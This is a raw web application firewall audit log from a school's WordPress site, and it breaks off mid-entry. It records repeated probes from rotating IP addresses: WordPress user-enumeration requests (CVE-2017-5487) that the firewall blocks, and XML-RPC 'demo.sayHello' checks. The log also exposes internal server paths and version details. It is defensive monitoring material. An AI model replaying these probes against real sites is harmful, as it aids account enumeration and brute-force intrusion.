proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452556253880 5170 (- - -) Stopwatch2: 1747452556253880 5170; combined=3874, p1=474, p2=3192, p3=23, p4=26, p5=93, sr=76, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7d95e2d-Z-- --364d2901-A-- [17/May/2025:10:30:35 +0700] aCgC23yxdQCiyU1ENFcrkgAAAAQ 103.236.140.4 50958 103.236.140.4 8181 --364d2901-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.29 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --364d2901-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --364d2901-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452635395919 2946 (- - -) Stopwatch2: 1747452635395919 2946; combined=1337, p1=455, p2=851, p3=0, p4=0, p5=30, sr=95, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --364d2901-Z-- --72b4d461-A-- [17/May/2025:10:30:45 +0700] aCgC5QTOsBn9MSWb6WJwHwAAAIo 103.236.140.4 50962 103.236.140.4 8181 --72b4d461-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.233 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --72b4d461-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --72b4d461-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452645587231 2471 (- - -) Stopwatch2: 1747452645587231 2471; combined=1117, p1=372, p2=716, p3=0, p4=0, p5=29, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --72b4d461-Z-- --48c0ef20-A-- [17/May/2025:10:30:45 +0700] aCgC5QTOsBn9MSWb6WJwIAAAAI4 103.236.140.4 50964 103.236.140.4 8181 --48c0ef20-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.29 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.29 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48c0ef20-C-- demo.sayHello --48c0ef20-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48c0ef20-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452645600279 4729 (- - -) Stopwatch2: 1747452645600279 4729; combined=3766, p1=407, p2=3146, p3=30, p4=32, p5=89, sr=65, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48c0ef20-Z-- --dbba3235-A-- [17/May/2025:10:30:51 +0700] aCgC63yxdQCiyU1ENFcrkwAAAAI 103.236.140.4 50970 103.236.140.4 8181 --dbba3235-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.174.233 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.174.233 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbba3235-C-- demo.sayHello --dbba3235-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbba3235-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452651087679 5020 (- - -) Stopwatch2: 1747452651087679 5020; combined=3775, p1=463, p2=3109, p3=27, p4=27, p5=88, sr=70, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbba3235-Z-- --e02cbf17-A-- [17/May/2025:10:32:32 +0700] aCgDUBKi5m5upc8uMd6jiQAAAM4 103.236.140.4 50974 103.236.140.4 8181 --e02cbf17-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e02cbf17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e02cbf17-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452752048266 3089 (- - -) Stopwatch2: 1747452752048266 3089; combined=1294, p1=435, p2=825, p3=0, p4=0, p5=34, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e02cbf17-Z-- --f1167c1a-A-- [17/May/2025:10:32:38 +0700] aCgDVhKi5m5upc8uMd6jiwAAANE 103.236.140.4 50978 103.236.140.4 8181 --f1167c1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 45.201.11.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 45.201.11.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f1167c1a-C-- demo.sayHello --f1167c1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1167c1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452758812687 5341 (- - -) Stopwatch2: 1747452758812687 5341; combined=4066, p1=520, p2=3329, p3=28, p4=34, p5=92, sr=71, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1167c1a-Z-- --5ee8c378-A-- [17/May/2025:10:32:55 +0700] aCgDZxKi5m5upc8uMd6jjQAAANQ 103.236.140.4 50984 103.236.140.4 8181 --5ee8c378-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.164 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5ee8c378-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5ee8c378-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452775877624 3064 (- - -) Stopwatch2: 1747452775877624 3064; combined=1326, p1=473, p2=817, p3=0, p4=0, p5=35, sr=119, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5ee8c378-Z-- --439c7729-A-- [17/May/2025:10:33:02 +0700] aCgDbgTOsBn9MSWb6WJwIwAAAJM 103.236.140.4 50988 103.236.140.4 8181 --439c7729-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.164.164 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.164.164 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --439c7729-C-- demo.sayHello --439c7729-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --439c7729-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452782271609 5724 (- - -) Stopwatch2: 1747452782271609 5724; combined=4190, p1=528, p2=3437, p3=36, p4=34, p5=92, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --439c7729-Z-- --2a42870c-A-- [17/May/2025:10:33:12 +0700] aCgDeOm4kjNN-hEbWjJDVQAAAEQ 103.236.140.4 51000 103.236.140.4 8181 --2a42870c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2a42870c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2a42870c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452792301933 2316 (- - -) Stopwatch2: 1747452792301933 2316; combined=1147, p1=388, p2=734, p3=0, p4=0, p5=25, sr=61, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2a42870c-Z-- --beb20d77-A-- [17/May/2025:10:33:18 +0700] aCgDfhKi5m5upc8uMd6jkgAAAMM 103.236.140.4 51008 103.236.140.4 8181 --beb20d77-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.167.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.167.171 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --beb20d77-C-- demo.sayHello --beb20d77-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --beb20d77-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452798493083 4798 (- - -) Stopwatch2: 1747452798493083 4798; combined=3706, p1=484, p2=3027, p3=23, p4=24, p5=87, sr=66, sw=61, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --beb20d77-Z-- --14d43b3e-A-- [17/May/2025:10:34:15 +0700] aCgDt3yxdQCiyU1ENFcrlgAAAAk 103.236.140.4 51014 103.236.140.4 8181 --14d43b3e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.244 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --14d43b3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --14d43b3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747452855193861 2843 (- - -) Stopwatch2: 1747452855193861 2843; combined=1232, p1=440, p2=762, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --14d43b3e-Z-- --fdc63b2e-A-- [17/May/2025:10:34:23 +0700] aCgDv3yxdQCiyU1ENFcrmQAAABE 103.236.140.4 51020 103.236.140.4 8181 --fdc63b2e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.125.244 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.125.244 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fdc63b2e-C-- demo.sayHello --fdc63b2e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fdc63b2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747452863654495 5835 (- - -) Stopwatch2: 1747452863654495 5835; combined=4320, p1=536, p2=3562, p3=31, p4=35, p5=93, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fdc63b2e-Z-- --9c18881b-A-- [17/May/2025:10:38:19 +0700] aCgEq3yxdQCiyU1ENFcrnAAAABY 103.236.140.4 51034 103.236.140.4 8181 --9c18881b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c18881b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c18881b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453099829035 3280 (- - -) Stopwatch2: 1747453099829035 3280; combined=1438, p1=509, p2=896, p3=0, p4=0, p5=33, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c18881b-Z-- --a60b746a-A-- [17/May/2025:10:38:25 +0700] aCgEsRKi5m5upc8uMd6jlAAAAMc 103.236.140.4 51038 103.236.140.4 8181 --a60b746a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.110.238 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.110.238 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a60b746a-C-- demo.sayHello --a60b746a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a60b746a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453105277748 6382 (- - -) Stopwatch2: 1747453105277748 6382; combined=4616, p1=617, p2=3762, p3=38, p4=43, p5=94, sr=81, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a60b746a-Z-- --37101972-A-- [17/May/2025:10:40:00 +0700] aCgFEBKi5m5upc8uMd6jlQAAAMg 103.236.140.4 51046 103.236.140.4 8181 --37101972-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --37101972-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --37101972-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747453200847538 2789 (- - -) Stopwatch2: 1747453200847538 2789; combined=1250, p1=438, p2=782, p3=0, p4=0, p5=30, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --37101972-Z-- --844dc410-A-- [17/May/2025:10:40:06 +0700] aCgFFnyxdQCiyU1ENFcroQAAAAU 103.236.140.4 51054 103.236.140.4 8181 --844dc410-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.43.232 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.43.232 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --844dc410-C-- demo.sayHello --844dc410-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --844dc410-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747453206725319 5133 (- - -) Stopwatch2: 1747453206725319 5133; combined=4110, p1=492, p2=3401, p3=30, p4=34, p5=91, sr=71, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --844dc410-Z-- --6a495733-A-- [17/May/2025:10:40:52 +0700] aCgFRBKi5m5upc8uMd6jmAAAAMw 103.236.140.4 51062 103.236.140.4 8181 --6a495733-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.112.46 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.112.46 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6a495733-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6a495733-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: 